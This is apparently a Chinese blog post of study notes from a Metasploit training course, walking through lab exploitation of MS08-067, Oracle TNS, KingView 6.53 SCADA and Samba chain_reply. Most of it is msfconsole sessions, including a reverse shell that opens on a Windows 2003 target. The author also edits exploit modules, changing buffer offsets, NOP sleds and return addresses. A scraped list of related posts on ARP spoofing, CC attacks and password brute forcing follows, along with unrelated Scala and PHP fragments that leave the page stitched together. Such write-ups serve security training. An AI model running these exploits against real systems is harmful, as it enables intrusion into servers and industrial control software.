青蛙爱轮滑

《Metasploit 魔鬼训练营》05 网络服务渗透攻击

本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程

内存攻防技术

MS08-067 攻击案例

Oricle 数据库

KingView 6.53 HistorySrv 渗透攻击

Samba 安全漏洞

###1.内存攻防技术 ###

内存攻击指的是攻击者利用软件安全漏洞，构造恶意输人导致软件在处理输人数据时出现非预期错误，将输人数据写人内存中的某些特定敏感位置，从而劫持软件控制流，转而执行外部输人的指令代码，造成目标系统被获取远程控制或被拒绝服务。内存攻击的表面原因是软件编写错误，诸如过滤输人的条件设置缺陷、变量类型转换错误、逻辑判断错误、指针引用错误等;但究其根本原因，是现代电子计算机在实现图灵机模型时，没有在内存中严格区分数据和指令，这就存在程序外部输人数据成为指令代码从而被执行的可能。任何操作系统级别的防护措施都不可能完全根除现代计算机体系结构上的这个弊端，而只是试图去阻止攻击者利用(Exploit)。因此，攻防两端围绕这个深层次原因的利用与防护，在系统安全领域你来我往进行了多年的博弈，推动了系统安全整体水平的螺旋式上升。

1. 缓冲区溢出
	http://www.cnblogs.com/fanzhidongyzby/archive/2013/08/10/3250405.html
	缓冲区溢出(Buffer Overflow 或Buffer Overrun) 漏洞是程序由于缺乏对缓冲区的边界
	条件检查而引起的一种异常行为，通常是程序向缓冲区中写数据，但内容超过了程序员设
	定的缓冲区边界，从而覆盖了相邻的内存区域，造成覆盖程序中的其他变量甚至影响控制
	流的敏感数据造成程序的非预期行为。而C 和C++ 语言缺乏内在安全的内存分配与管理机
	制，因此很容易导致缓冲区溢出相关的问题。
堆溢出
	http://www.freebuf.com/vuls/98404.html
	http://blog.csdn.net/aemperor/article/details/47310593
	http://blog.csdn.net/stonesharp/article/details/50766429

###2.MS08-067 攻击案例 ###


	MS08-067 漏洞是通过MSRPC over SMB 通道调用Server 服务程序中的NetPathCanonicalize 函
数时触发的，而NetPathCanonicalize 函数在远程访问其他主机时，会调用NetpwPathCanonicalize
函数，对远程访问的路径进行规范化，而在NetpwPathCanonicalize 函数中发生了栈缓冲区内存
错误，造成可被利用实施远程代码执行。
	所谓的路径规范化，就是将路径字符串中的" 转换为",同时去除相对路径"\\" 和"\.\"。如下所示:
	n**\*\.\**"		=>		"**\*\**"
	"**\*\..\**"	=>		"**\**"
	在路径规范化的操作中，服务程序对路径字符串的地址空间检查存在逻辑漏洞。攻击
者精心设计的输人路径，可以在函数去除"\.\" 字符串时，把路径字符串中的内容复制到路
径串之前的地址空间中(低地址)，达到覆盖函数返回地址，执行任意代码的目的。
	

msf > search ms08_067
	Matching Modules
	================
	   Name                                 Disclosure Date  Rank   Description
	   ----                                 ---------------  ----   -----------
	   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > show payloads 
	set 
	Compatible Payloads
	===================

	   Name                                                Disclosure Date  Rank    Description
	   ----                                                ---------------  ----    -----------
	   generic/custom                                                       normal  Custom Payload
	   generic/debug_trap                                                   normal  Generic x86 Debug Trap
	   generic/shell_bind_tcp                                               normal  Generic Command Shell, Bind TCP Inline
	   generic/shell_reverse_tcp                                            normal  Generic Command Shell, Reverse TCP Inline
	   ..............................
	   ..............................
	   ..............................
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp 
	payload => generic/shell_reverse_tcp
msf exploit(ms08_067_netapi) > show options 
	Module options (exploit/windows/smb/ms08_067_netapi):
	   Name     Current Setting  Required  Description
	   ----     ---------------  --------  -----------
	   RHOST    192.168.10.128   yes       The target address
	   RPORT    445              yes       The SMB service port (TCP)
	   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
	Payload options (generic/shell_reverse_tcp):
	   Name   Current Setting  Required  Description
	   ----   ---------------  --------  -----------
	   LHOST  10.10.10.128     yes       The listen address
	   LPORT  5000             yes       The listen port
	Exploit target:
	   Id  Name
	   --  ----
	   6   Windows XP SP3 English (AlwaysOn NX)
	   
msf exploit(ms08_067_netapi) > show targets 
	Exploit targets:
	   Id  Name
	   --  ----
	   	0   Automatic Targeting
	 	1   Windows 2000 Universal
	 	2   Windows XP SP0/SP1 Universal
	  	3   Windows 2003 SP0 Universal
	  	4   Windows XP SP2 English (AlwaysOn NX)
	   	5   Windows XP SP2 English (NX)
		6   Windows XP SP3 English (AlwaysOn NX)
		7   Windows XP SP3 English (NX)
		8   Windows XP SP2 Arabic (NX)
		9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
		10  Windows XP SP2 Chinese - Simplified (NX)
	   ..............................
	   ..............................
	   ..............................
msf exploit(ms08_067_netapi) > set RHOST 10.10.10.130
	RHOST => 10.10.10.130
msf exploit(ms08_067_netapi) > set LPORT 5000
	LPORT => 5000
msf exploit(ms08_067_netapi) > set LHOST 10.10.10.128
	LHOST => 10.10.10.128
msf exploit(ms08_067_netapi) > set target 3		# 选择靶机系统的版本类型的ID
	target => 3
msf exploit(ms08_067_netapi) > show options 
	Module options (exploit/windows/smb/ms08_067_netapi):
	   Name     Current Setting  Required  Description
	   ----     ---------------  --------  -----------
	   RHOST    10.10.10.130     yes       The target address
	   RPORT    445              yes       The SMB service port (TCP)
	   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
	Payload options (generic/shell_reverse_tcp):
	   Name   Current Setting  Required  Description
	   ----   ---------------  --------  -----------
	   LHOST  10.10.10.128     yes       The listen address
	   LPORT  5000             yes       The listen port
	Exploit target:
	   Id  Name
	   --  ----
	   3   Windows 2003 SP0 Universal
	   
msf exploit(ms08_067_netapi) > exploit 
	[*] Started reverse TCP handler on 10.10.10.128:5000 
	[*] 10.10.10.130:445 - Attempting to trigger the vulnerability...
	[*] Command shell session 2 opened (10.10.10.128:5000 -> 10.10.10.130:1397) at 2017-09-19 03:11:10 -0400
	Microsoft Windows [Version 5.2.3790]
	(C) Copyright 1985-2003 Microsoft Corp.
	C:\WINDOWS\system32>ipconfig/all     
	ipconfig/all
	Windows IP Configuration
	   Host Name . . . . . . . . . . . . : root-tvi862ubeh
	   Primary Dns Suffix  . . . . . . . : 
	   Node Type . . . . . . . . . . . . : Unknown
	   IP Routing Enabled. . . . . . . . : No
	   WINS Proxy Enabled. . . . . . . . : No
	Ethernet adapter Local Area Connection:
	   Connection-specific DNS Suffix  . : 
	   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
	   Physical Address. . . . . . . . . : 00-0C-29-DB-51-D2
	   DHCP Enabled. . . . . . . . . . . : No
	   IP Address. . . . . . . . . . . . : 10.10.10.130
	   Subnet Mask . . . . . . . . . . . : 255.255.255.0
	   Default Gateway . . . . . . . . . : 10.10.10.254
	C:\WINDOWS\system32>

###3.Oricle 数据库 ###

msf > use exploit/windows/oracle/tns_auth_sesskey 
msf exploit(tns_auth_sesskey) > show options 
	Module options (exploit/windows/oracle/tns_auth_sesskey):
	   Name   Current Setting  Required  Description
	   ----   ---------------  --------  -----------
	   RHOST                   yes       The target address
	   RPORT  1521             yes       The target port (TCP)
	   SID    ORCL             yes       The target database SID
	Exploit target:
	   Id  Name
	   --  ----
	   0   Automatic
msf exploit(tns_auth_sesskey) > set RHOST 10.10.10.130
	RHOST => 10.10.10.130
	msf exploit(tns_auth_sesskey) > show targets 
	Exploit targets:
	   Id  Name
	   --  ----
	   0   Automatic
	   1   Oracle 10.2.0.1.0 Enterprise Edition
	   2   Oracle 10.2.0.4.0 Enterprise Edition
msf exploit(tns_auth_sesskey) > set target 1
	target => 1
msf exploit(tns_auth_sesskey) > show options 
	Module options (exploit/windows/oracle/tns_auth_sesskey):
	   Name   Current Setting  Required  Description
	   ----   ---------------  --------  -----------
	   RHOST  10.10.10.130     yes       The target address
	   RPORT  1521             yes       The target port (TCP)
	   SID    ORCL             yes       The target database SID
	Exploit target:
	   Id  Name
	   --  ----
	   1   Oracle 10.2.0.1.0 Enterprise Edition
msf exploit(tns_auth_sesskey) > exploit 
	[*] Started reverse TCP handler on 10.10.10.128:4444 
	[*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
	[*] 10.10.10.130:1521 - Sending NSPTCN packet ...
	[*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
	[*] 10.10.10.130:1521 - Sending NA packet ...
	[*] 10.10.10.130:1521 - Sending TTIPRO packet ...
	[*] 10.10.10.130:1521 - Sending TTIDTY packet ...
	[-] 10.10.10.130:1521 - Exploit failed: EOFError EOFError
	[*] Exploit completed, but no session was created.
#修改源代码：	
root@attacker:/usr/share/metasploit-framework/modules/exploits/windows/oracle# vim tns_auth_sesskey.rb 
	# build exploit buffer
    print_status("Calling kpoauth with long AUTH_SESSKEY ...")
    sploit = payload.encoded
    sploit << rand_text_alphanumeric(0x19a - 0x17e + 0x10)  # 209行增加0x10
    sploit << generate_seh_record(mytarget.ret)
    distance = payload_space + 8 + 5 + 0x20					# 211行增加0x20	
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
#重新利用（我没做成功，书上是这么做的，以后发现方法会更正）
msf exploit(tns_auth_sesskey) > rexploit 
	[*] Reloading module...
	[*] Started reverse TCP handler on 10.10.10.128:4444 
	[*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
	[*] 10.10.10.130:1521 - Sending NSPTCN packet ...
	[*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
	[*] 10.10.10.130:1521 - Sending NA packet ...
	[*] 10.10.10.130:1521 - Sending TTIPRO packet ...
	[*] 10.10.10.130:1521 - Sending TTIDTY packet ...
	[-] 10.10.10.130:1521 - Exploit failed: EOFError EOFError
	[*] Exploit completed, but no session was created.

###4.KingView 6.53 HistorySrv 渗透攻击 ###

	http://www.cnblogs.com/justforfun12/p/5256405.html
	google 下载 http://www.securityfocus.com/bid/45727/exploit 
	链接：http://pan.baidu.com/s/1c2GTDJy 密码：zhzj
	放置在 /usr/share/metasploit-framework/modules/exploits/windows/scada 目录
	把 45727.rb 改名为 KingView6.53overflow.rb
	
msf > search kingview
	Matching Modules
	================
	   Name                                              Disclosure Date  Rank    Description
	   ----                                              ---------------  ----    -----------
	   exploit/windows/fileformat/kingview_kingmess_kvl  2012-11-20       normal  KingView Log File Parsing Buffer Overflow
	   exploit/windows/scada/KingView6.53overflow                         good    Kingview 6.53 SCADA HMI HistorySvr Heap Overflow
msf > use exploit/windows/scada/KingView6.53overflow 
msf exploit(KingView6.53overflow) > show options 
	Module options (exploit/windows/scada/KingView6.53overflow):
	   Name   Current Setting  Required  Description
	   ----   ---------------  --------  -----------
	   RHOST                   yes       The target address
	   RPORT  777              yes       The target port (TCP)
	Exploit target:
	   Id  Name
	   --  ----
	   0   Windows XP SP1
msf exploit(KingView6.53overflow) > set RHOST 10.10.10.130
	RHOST => 10.10.10.130
msf exploit(KingView6.53overflow) > show targets 
	Exploit targets:
	   Id  Name
	   --  ----
	   0   Windows XP SP1
	   1   Windows XP SP3 EN
msf exploit(KingView6.53overflow) > set target 1
	target => 1
msf exploit(KingView6.53overflow) > show options 
	Module options (exploit/windows/scada/KingView6.53overflow):
	   Name   Current Setting  Required  Description
	   ----   ---------------  --------  -----------
	   RHOST  10.10.10.130     yes       The target address
	   RPORT  777              yes       The target port (TCP)
	Exploit target:
	   Id  Name
	   --  ----
	   1   Windows XP SP3 EN
msf exploit(KingView6.53overflow) > exploit 
	[*] Started reverse TCP handler on 10.10.10.128:4444 
	[*] 10.10.10.130:777 - Trying target Windows XP SP3 EN
	[*] Exploit completed, but no session was created.

#修改配置文件	
root@attacker:/usr/share/metasploit-framework/modules/exploits/windows/scada# vim KingView6.53overflow.rb 
	'Targets'	 =>
	[
		[ 'Windows XP SP1', {'Ret' => 0x77ED73B4} ], #UnhandledExceptionFilter() in kernel32.dll
		[ 'Windows XP SP3 EN', {'Ret' => 0x00A1FB84} ],
		[ 'Windows 2003 SP0 EN', {'Ret' => 0x00A1FB84} ],#New target  52行
	],
msf exploit(KingView6.53overflow) > reload
	[*] Reloading module...
msf exploit(KingView6.53overflow) > show targets 
	Exploit targets:

	   Id  Name
	   --  ----
	   0   Windows XP SP1
	   1   Windows XP SP3 EN
	   2   Windows 2003 SP0 EN
msf exploit(KingView6.53overflow) > set target 2
	target => 2
msf exploit(KingView6.53overflow) > exploit 
	[*] Started reverse TCP handler on 10.10.10.128:4444 
	[*] 10.10.10.130:777 - Trying target Windows 2003 SP0 EN
	[*] Exploit completed, but no session was created.

#修改配置文件
root@attacker:/usr/share/metasploit-framework/modules/exploits/windows/scada# vim KingView6.53overflow.rb 
'Targets'	 =>
	[
		[ 'Windows XP SP1', {'Ret' => 0x77ED73B4} ], #UnhandledExceptionFilter() in kernel32.dll
		[ 'Windows XP SP3 EN', {'Ret' => 0x00A1FB84} ],
		[ 'Windows 2003 SP0 EN 1', {'Ret' => 0x00B404B4} ],#New target
	]，
	'DisclosureDate' => "9/28/2010",
	'DefaultTarget' => 0))
elsif target.name = ~/2003 SP0 EN 1/
   #sploit << make_nops(1024)
	sploit << make_nops(1024)
	sploit << "\xC4\x04\xB4\x00"
	sploit << payload.encoded
	sploit << "\x44"*(31752-payload.encoded.length)
	sploit << [target.ret].pack('V')
			
#重新测试
msf exploit(KingView6.53overflow) > reload
	[*] Reloading module...
msf exploit(KingView6.53overflow) > show targets 
	Exploit targets:
	   Id  Name
	   --  ----
	   0   Windows XP SP1
	   1   Windows XP SP3 EN
	   2   Windows 2003 SP0 EN 1
msf exploit(KingView6.53overflow) > set target 2
	target => 2
msf exploit(KingView6.53overflow) > show options 
	Module options (exploit/windows/scada/KingView6.53overflow):
	   Name   Current Setting  Required  Description
	   ----   ---------------  --------  -----------
	   RHOST  10.10.10.130     yes       The target address
	   RPORT  777              yes       The target port (TCP)
	Payload options (windows/meterpreter/reverse_tcp):
	   Name      Current Setting  Required  Description
	   ----      ---------------  --------  -----------
	   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
	   LHOST     10.10.10.128     yes       The listen address
	   LPORT     4444             yes       The listen port
	Exploit target:
	   Id  Name
	   --  ----
	   2   Windows 2003 SP0 EN 1
msf exploit(KingView6.53overflow) > exploit 	#书上这步已经成功了
[*] Exploit completed, but no session was created.

###5.Samba 安全漏洞 ###

	/usr/share/metasploit-framework/modules/exploits/linux/samba/chain_reply.rb
	
msf > search chain_reply
	Matching Modules
	================
	   Name                             Disclosure Date  Rank  Description
	   ----                             ---------------  ----  -----------
	   exploit/linux/samba/chain_reply  2010-06-16       good  Samba chain_reply Memory Corruption (Linux x86)

msf > search chain_reply
	Matching Modules
	================
	   Name                             Disclosure Date  Rank  Description
	   ----                             ---------------  ----  -----------
	   exploit/linux/samba/chain_reply  2010-06-16       good  Samba chain_reply Memory Corruption (Linux x86)
msf > use exploit/linux/samba/chain_reply 
	msf exploit(chain_reply) > show targets 
	Exploit targets:
	   Id  Name
	   --  ----
	   0   Linux (Debian5 3.2.5-4lenny6)
	   1   Debugging Target
msf exploit(chain_reply) > set target 0
	target => 0
msf exploit(chain_reply) > show options 
	Module options (exploit/linux/samba/chain_reply):
	   Name   Current Setting  Required  Description
	   ----   ---------------  --------  -----------
	   RHOST  10.10.10.254     yes       The target address
	   RPORT  139              yes       The target port (TCP)
	Exploit target:
	   Id  Name
	   --  ----
	   0   Linux (Debian5 3.2.5-4lenny6)

# 修改ubuntu 系统
root@gate:~# echo /proc/sys/kernel/randomize_va_space
# 查找 Samba 服务进程号，随后将 GDB 附加到 Samba 服务进程中，并设置为跟踪子进程
root@gate:~# ps aux | grep smbd
	root      5080  0.0  0.1   7724  1708 ?        Ss   Sep18   0:00 /usr/sbin/smbd -D
	root      5084  0.0  0.0   7724   816 ?        S    Sep18   0:00 /usr/sbin/smbd -D
	root      6828  0.0  0.0   3004   760 pts/1    R+   09:20   0:00 grep --color=auto smbd
		
#继续 msf
msf exploit(chain_reply) > exploit 
	[*] Started reverse TCP handler on 10.10.10.128:4444 
	[*] 10.10.10.254:139 - Trying return address 0x081ed5f2...
	[*] 10.10.10.254:139 - Trying return address 0x081ed5f2...
root@gate:~# cd /usr/sbin/
root@gate:/usr/sbin# gdb --pid 5080
	GNU gdb 6.8-debian
	0xb7cea410 in __kernel_vsyscall ()
	(gdb) set follow-fork-mode child
	(gdb) c
	Continuing.

###6. ###

ARP欺骗（断网测试） Passion-优网络安全网络攻击模型测试工具
一.测试实验环境1.软件：VMwareWorkstations14以上版本2.虚拟机：Kali-Linux、Windows71)打开虚拟机：启动kali-linux启动windows7（未装补丁）2)获取IP地址（ifconfig、ipconfig）Kali-Linux：192.168.164.129Windows7：192.168.164.138二.实验步骤具体攻击实现具体的中间人攻击，大体上可
❖ Kali-linux 初识 Solomon_Xie
基本我发现Kali-linux其实不用安装，直接在光盘里运行也能很好的完成几乎所有需要的任务。Kali默认账户就直接是root，默认密码是toor，反过来罢了。Kali默认SSH都开启的，只是端口没开启。所以想从别的地方ssh进来，需要改一下sshd的配置/etc/ssh/ssd_config，只需把端口22那一行取消注释即可。Kali主要就方便在默认就安装好了一系列常用的程序，相当于一个“精装修
Kali-Linux 使用evillimiter，采用arp欺骗，限制上网速度坦笑&&life 网络安全 linux 运维服务器
Kali-Linux使用evillimiter，采用arp欺骗，限制上网速度1.首先下载evillimiter工具///从github上下载此工具gitclonehttps://github.com/bitbrute/evillimiter.git2.使用cd命令进入此工具目录cdevillimiter3.使用Python3安装此工具（安装方法可自行百度）sudopython3setup.pyin
Kali-linux + VMware安装 came_861 linux 服务器
目录一、kali镜像下载二、安装过程：一、kali镜像下载下载地址：https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2022.4/二、安装过程：打开vmware,创建新的虚拟机选择“自定义（高级）”：选择已经下载好的镜像文件的路径（也可以选择稍后安装）选择如图设置命名虚拟机的名称、选择该虚拟机安装位置按照图中设置这里可根据个人电脑设备情况
kali-Linux安装ARL灯塔教程以及timeout of 20000ms exceeded 的解决方法是liku不是里库 WEB安全 linux 运维服务器
FLAG：别和妈妈诉苦，她帮不上，也睡不着。专研方向:docker，ARL资产灯塔系统每日emo：天冷了，你还在坚持吗？欢迎各位与我这个菜鸟交流学习kali安装ARL灯塔教程1.安装docker环境，有了就跳过aptinstalldocker.io2.确保安装成功，查看docker版本dockerversion出现即算成功安装3.docker安装成功后重启即可reboot4.安装arl灯塔，两种方
渗透测试实战之ARP欺骗攻击（ARP断网攻击）爱玩游戏的黑客网络基础网络网络安全 linux 服务器
一、实训目的：通过实训理解ARP欺骗的原理掌握中间攻击的方法。二、场景描述：在虚拟机环境下配置“Win7”和“KaliLinux”虚拟系统，使得2个系统之间能够相互通信，网络拓扑如图所示。三、实验环境：1.软件：VMwareWorkstations14以上版本2.虚拟机：Kali-Linux、Windows71)打开虚拟机：启动kali-linux启动windows7（未装补丁）2)获取IP地址（
如何在Kali-Linux中进行cc攻击 Albart575 linux ddos
cc攻击原理：CC攻击的原理就是攻击者控制某些主机不停地发大量数据包给对方服务器造成服务器资源耗尽，一直到宕机崩溃。CC主要是用来消耗服务器资源的，每个人都有这样的体验：当一个网页访问的人数特别多的时候，打开网页就慢了，CC就是模拟多个用户(多少线程就是多少用户)不停地进行访问那些需要大量数据操作(就是需要大量CPU时间)的页面，造成服务器资源的浪费，CPU长时间处于100%，永远都有处理不完的连
Kali-linux新手教程，分辨率推荐，中文配置，中文输入法，VScode配置，root配置半只野指针 linux vscode 运维网络安全
Kali-linux新手教程（基于vm和22.04版本kali）1.VM分辨率问题vm的kali的字体是比较小的，根据经验；建议开1280*720，并且勾选自由拉伸2.解决初始化使用root问题在初始化界面按e进入初始化高级菜单（这里实际上是修改boot目录下某些文件达到目的）注意到在GRUB界面下的红框部分roquietsplash修改为rwquietsplashinit=/bin/bash使用
如何在Hyper-V中安装Kali-Linux系统 Albart575 linux 运维服务器
一、下载kali镜像在官网下载GetKali|KaliLinux下载这个二、创建Hyper-V虚拟机在搜索框搜索启用和关闭Windows功能之后打开选择下面这几个功能这是windows专业版的功能，家庭版没有，想要获取请参考Win10家庭中文版安装Hyper-V-知乎(zhihu.com)安装好后重启电脑，在搜索框中搜索Hyper-V，打开,在管理器的界面，选择右边的“新建”点虚拟机之后点击下一步
Kali-Linux常用命令狙个栗子 linux 服务器运维
Kali-Linux常用命令一.lsls/dev-l#以一种长列表格式展示路径下的文件drwxr-xr-xd表示文件属性为一个目录，后面字符三个一组，分别表示文件所有者，文件所属组，其他用户对该文件所拥有的权限（r-读(权重4)，w-写(权重2)，x-执行(权重1)）ls/dev-alh--sort=size长列表展示/dev目录下的所有文件，直观展示文件大小并按照文件大小进行排序a即all,所有
适用于 Linux 的 Windows 子系统（WSL） BinaryMoon Windows UNIX Like Tool linux windows 运维
适用于Linux的Windows子系统（WSL）描述什么是“适用于Linux的Windows子系统”系统要求Windows10。Windows11。查看计算机系统的版本虚拟化功能启用虚拟化功能禁用虚拟化功能检测是否开启虚拟化功能使用WSL运行Linux的各类发行版查看可供安装的Linux各类发行版安装KaliLinuxRolling安装相关的软件开启Hyper-V功能安装kali-linux发行版
安鸾渗透实战平台——SSH离线破解 (250分) 阿文、... 安鸾渗透实战平台 ssh 安全 linux
漏洞环境安鸾渗透实战平台kali（john）：linux密码攻击工具；详情了解请转到这位师傅的博客：https://www.fujieace.com/kali-linux/courses/john.html题目打开压缩包会得到两个文件字典文件shadow：1、Linux操作系统下有一个文件负责所有用户的密码。那就是shadow；2、/etc/shadow文件中的记录行与/etc/passwd中的一
Kali-linux：nmap命令胖哥王老师 linux知识 nmap kali linux kali 漏洞扫描
概念Nmap用于在远程机器上探测网络，执行安全扫描，网络审计和搜寻开放端口。它会扫描远程在线主机，该主机的操作系统，包过滤器和开放的端口。使用场景掌握了具体使用场景，主要就是掌握如下参数使用：以192.168.31.18为目标靶机1.普通扫描root@sunjin:/home/sunjin#nmap192.168.31.18StartingNmap7.80(https://nmap.org)at2
VMware虚拟机安装Kali-Linux qmkn Linux
安装Kali-Linux:史上最详细的VM虚拟机安装Kali-linux教程(以2020.1版本为例，含下载地址+默认提升为root权限)2021.1安装kaliLinux最新版本虚拟机两个链接都可以安装VM虚拟机：VM
Kali Linux渗透测试技术详解_渗透测试入门哈喽沃德er linux 系统安全网络
知识点1.KaliLinux是做渗透测试用的2.安装VMwareWorkstation虚拟机3.安装kali-linux系统4.基本用法-重新设置root密码5安装debian11系统-默认命令行模式登录1.KaliLinux是做渗透测试用的渗透测试是通过模拟恶意黑客的攻击方法，来评估计算机网络系统安全的一种评估方法，这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析。渗透测试与其他评估方法不
Windows10 WSL安装kali-linux ghostliner linux windows
Windows10WSL安装kali-linuxWindows10安装WSL参考：安装WSL|MicrosoftLearn前言适用于Linux的Windows子系统(WSL)可让开发人员直接在Windows上按原样运行GNU/Linux环境（包括大多数命令行工具、实用工具和应用程序），且不会产生传统虚拟机或双启动设置开销。系统需求必须运行Windows10版本2004及更高版本（内部版本19041
nmap参数孤君蓑笠翁
0x00nmap使用背景Nmap是一个网络连接端扫描软件，用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端，并且推断计算机运行哪个操作系统。它是网络管理员必用的软件之一，以及用以评估网络系统安全。网上有不少介绍nmap使用的方法，但是本文主要介绍在实践中，很有成效并且经常会用到的命令。0x01nmap使用方法#以下的实践方案均是基于KALI-LINUX进行的，但是只要在安装有nmap
穷举爆破神器hydra详细讲解和利用 maverickpig 渗透测试自学日志之基础原理篇安全 web安全
渗透测试自学笔记，想把自己所学的完整记录下来关于Hydrahydra是一个支持众多协议的爆破工具，已经集成到Kali-Linux中，直接在终端打开即可，同时也有Windows版（链接）Windows版Kali版你可以在Github上找到它的源码：https://github.com/vanhauser-thc/thc-hydraHydra使用hydra有两个版本命令行版本GUI版本其中GUI版本叫
Kali-linux查看打开的端口网络安全百宝库（一） linux 网络服务器 web安全网络安全
对一个大范围的网络或活跃的主机进行渗透测试，必须要了解这些主机上所打开的端口号。在KaliLinux中默认提供了Nmap和Zenmap两个扫描端口工具。为了访问目标系统中打开的TCP和UDP端口，本节将介绍Nmap和Zenmap工具的使用。4.4.1TCP端口扫描工具Nmap使用Nmap工具查看目标主机192.168.41.136上开放的端口号。执行命令如下所示：root@kali:~#nmap1
sqlmap的安装与使用乔治777 sql web安全
文章目录sqlmap的安装sqlmap的使用Windows下的sqlmap：get方式注入post方式注入kali-linux下的sqlmap（待更新）sqlmap的安装准备工作：（1）python2.7.18（只能安装2.6--3.0版本）下载地址：https://www.python.org/downloads/安装时：直接next将“Addpython.exetoPath”项勾选，勾选后安装
Kali-linux攻击路由器网络安全百宝库（一） linux 智能路由器网络网络安全 Kali
前面介绍的各种工具，都是通过直接破解密码，来连接到无线网络。由于在一个无线网络环境的所有设备中，路由器是最重要的设备之一。通常用户为了保护路由器的安全，通常会设置一个比较复杂的密码。甚至一些用户可能会使用路由器的默认用户名和密码。但是，路由器本身就存在一些漏洞。如果用户觉得对复杂的密码着手可能不太容易。这时候，就可以利用路由器自身存在的漏洞实施攻击。本节将介绍使用Routerpwn工具实施攻击路由
Kali-linux密码在线破解网络安全百宝库（一） linux 网络安全网络安全 Kali
为了使用户能成功登录到目标系统，所以需要获取一个正确的密码。在Kali中，在线破解密码的工具很多，其中最常用的两款分别是Hydra和Medusa。本节将介绍使用Hydra和Medusa工具实现密码在线破解。8.1.1Hydra工具Hydra是一个相当强大的暴力密码破解工具。该工具支持几乎所有协议的在线密码破解，如FTP、HTTP、HTTPS、MySQL、MSSQL、Oracle、Cisco、IMA
Kali-linux无线网络嗅探工具Kismet 网络安全百宝库（一） linux 服务器网络 Kali 网络安全
如果要进行无线网络渗透测试，则必须先扫描所有有效的无线接入点。刚好在KaliLinux中，提供了一款嗅探无线网络工具Kismet。使用该工具可以测量周围的无线信号，并查看所有可用的无线接入点。本节将介绍使用Kismet工具嗅探无线网络。（1）启动Kismet工具。执行命令如下所示：root@kali:~#kismet执行以上命令后，将显示如图9.1所示的界面。图9.1终端延伸（2）该界面用来设置是
虚拟机-安装与使用2023 逸佳6 linux 运维服务器
虚拟机-安装与使用前言一、虚拟机1.VMware2.Virtualbox二、VMware的下载三、VMware的安装四、验证是否安装成功五、运行VMware六、VMware上安装其它操作系统安装Windows10安装CentOS-Linux安装Kali-Linux七、VMware常用功能同步时间系统备份克隆快照内存设置八、安装过程时遇到的问题九、总结前言最近学习elasticsearch，但是es
VMware安装 kali-linux出现的报错：未能启动虚拟机 Kasusa linux 运维服务器
VMware安装kali-linux出现的报错：未能启动虚拟机右键-兼容性，改成vm16.发生错误，导致虚拟CPU进入关闭状态找到.vmx文件，搜索并修改成：virtualHW.version="16"
VMware 之安装 kali-linux 操作步骤何文礼
1.安装linux版的VMware-tools1.1找到VMwareworkstations的安装目录下的linux.isolinux.iso导入镜像文件linux.isolinux。iso1.2进行光盘挂载，挂载命令：root@kali:/#mount/dev/sr0/mnt未连接光驱查看光盘内容并解压VMwareTools-10.3.10-13959562.tar.gz压缩包，进入目录进行安装
口令暴力破解--Ftp协议暴力破解与Ssh协议暴力破解知不足，而学习杂文服务器网络 linux
Ftp协议暴力破解FTP服务检测FTP服务FTP是一种文件传输协议，FTP服务默认端口为21。利用FTP服务器可以在本地主机和远程主机间进行文件传输。当FTP没有配置好安全控制，如对登录的源地址及密码尝试次数做限制，那么就会存在暴力破解可能。本次靶机服务器地址：193.168.1.23Nmap扫描打开kali-linux虚拟机，利用kali-linux自带的nmap扫描：nmap–v–A–Pn19
由于未安装所需的特性,无法启动操作 Jacky1008611 wsl linux 其他 windows
由于未安装所需的特性,无法启动操作win10的wsl升级成wsl2时需要在windowsTerminal中输入wsl--set-versionUbuntu2,来把安装好的Ubuntu升级成wsl2版本。但是报错：由于未安装所需的特性,无法启动操作。而翻遍百度也没有解决方案。同时，下载其他的Linux版本，比如：Kali-linux。启动时，会报：WSL2InstallingLinuxfailed,
树莓派 kali 安装raspi-config 欧阳睿树莓派 raspberry pi
文章目录下载raspi-config安装包执行安装命令树莓派官方系统预装有raspi-config，但是比如Ubuntu、kali系统并没有安装。以此文简单记录kali-linux安装raspi-config的过程。下载raspi-config安装包前往官网下载最新版安装包下载地址：http://archive.raspberrypi.org/debian/pool/main/r/rasp
虚拟机-安装与使用（详细教程）多加点辣也没关系安装教程 linux 运维 java
虚拟机-安装与使用前言一、虚拟机1.VMware2.Virtualbox二、VMware的下载三、VMware的安装四、验证是否安装成功五、运行VMware六、VMware上安装其它操作系统1.安装Windows102.安装CentOS-Linux3.安装Kali-Linux七、VMware常用功能1.同步时间2.系统备份1.克隆2.快照3.内存设置八、安装过程时遇到的问题九、总结前言最近学习el
scala的option和some 矮蛋蛋编程 scala
原文地址： http://blog.sina.com.cn/s/blog_68af3f090100qkt8.html 对于学习 Scala 的 Java™ 开发人员来说，对象是一个比较自然、简单的入口点。在本系列前几期文章中，我介绍了 Scala 中一些面向对象的编程方法，这些方法实际上与 Java 编程的区别不是很大。我还向您展示了 Scala 如何重新应用传统的面向对象概念，找到其缺点
NullPointerException Cb123456 android BaseAdapter
java.lang.NullPointerException: Attempt to invoke virtual method 'int android.view.View.getImportantForAccessibility()' on a null object reference 出现以上异常.然后就在baidu上
PHP使用文件和目录天子之骄 php文件和目录读取和写入 php验证文件 php锁定文件
PHP使用文件和目录 1.使用include()包含文件 (1)：使用include()从一个被包含文档返回一个值 (2)：在控制结构中使用include() include_once()函数需要一个包含文件的路径，此外，第一次调用它的情况和include()一样，如果在脚本执行中再次对同一个文件调用，那么这个文件不会再次包含。在php.ini文件中设置
SQL SELECT DISTINCT 语句何必如此 sql
